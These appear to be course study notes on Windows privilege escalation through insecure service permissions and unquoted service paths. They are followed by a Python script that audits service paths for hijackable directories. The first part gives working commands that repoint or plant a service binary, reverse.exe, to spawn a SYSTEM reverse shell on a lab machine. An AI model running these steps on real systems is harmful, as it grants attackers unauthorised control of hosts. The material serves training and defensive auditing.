Final Draft 1
Tib3rius's Windows Privilege Escalation
Service Exploits - Insecure Service Permissions
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
#Note that the "user" account has the permission to change the service config (SERVICE_CHANGE_CONFIG).
#Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):
sc qc daclsvc
#Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
#Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start daclsvc
Service Exploits - Unquoted Service Path
#Use WinPEAS / PowerUp to check for unquoted service paths.
#Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.
sc qc unquotedsvc
#Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
#Copy the reverse.exe executable you created to this directory and rename it Common.exe:
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
#Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start unquotedsvc
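Added audit example (not part of the original notes or of the course material): given the `sc qc` output and the directories accesschk reported as writable, it reports which account the service runs as, the order of executables Windows would try for an unquoted path with spaces, and which of those sit in a non-admin-writable directory, i.e. the ACL to tighten or the path to quote. The sample `sc qc` output and the writable-directory list are constructed to mirror the unquotedsvc lab above, and the image path is assumed to carry no arguments.

```python
import ntpath
import re
from typing import Dict, Iterable, List

# Constructed sample of `sc qc` output modelled on the page's unquotedsvc
# scenario (not captured from a real host).
SAMPLE_SC_QC = r"""SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        DISPLAY_NAME       : Unquoted Path Service
        SERVICE_START_NAME : LocalSystem
"""
# Constructed: directories accesschk -uwdq reported writable by BUILTIN\Users.
SAMPLE_WRITABLE_DIRS = ["C:\\Program Files\\Unquoted Path Service\\"]

def parse_sc_qc(text: str) -> Dict[str, str]:
    """Turn the `KEY : VALUE` lines of `sc qc` output into a dict."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def search_candidates(binary_path: str) -> List[str]:
    """Executables CreateProcess tries, in order, for a service image path:
    a quoted path only itself; an unquoted path with spaces every prefix
    ending before a space (plus .exe) and then the full path.
    Assumes BINARY_PATH_NAME carries no command-line arguments."""
    path = binary_path.strip()
    if path.startswith('"'):
        return [path[1:path.index('"', 1)]]
    candidates = [path[:i] + ".exe" for i, ch in enumerate(path) if ch == " "]
    return candidates + [path]

def hijackable(candidates: Iterable[str], writable_dirs: Iterable[str]) -> List[str]:
    """Candidates whose directory is writable by non-admins: the ACLs to fix
    (or remove the ambiguity entirely by quoting the service path)."""
    norm = lambda p: ntpath.normcase(p).rstrip("\\")
    writable = {norm(d) for d in writable_dirs}
    return [c for c in candidates if norm(ntpath.dirname(c)) in writable]

def audit_service(sc_output: str, writable_dirs: Iterable[str]) -> Dict[str, object]:
    """Summarise one service: who it runs as, its search order, and findings."""
    cfg = parse_sc_qc(sc_output)
    cands = search_candidates(cfg["BINARY_PATH_NAME"])
    return {"service": cfg["SERVICE_NAME"], "runs_as": cfg["SERVICE_START_NAME"],
            "unquoted_with_spaces": len(cands) > 1, "search_order": cands,
            "hijackable": hijackable(cands, writable_dirs)}
```

A quoted path or one without spaces yields a single candidate and an empty hijackable list, which is the state to verify after fixing a service with `sc config <name> binpath= "\"<full path>\""`.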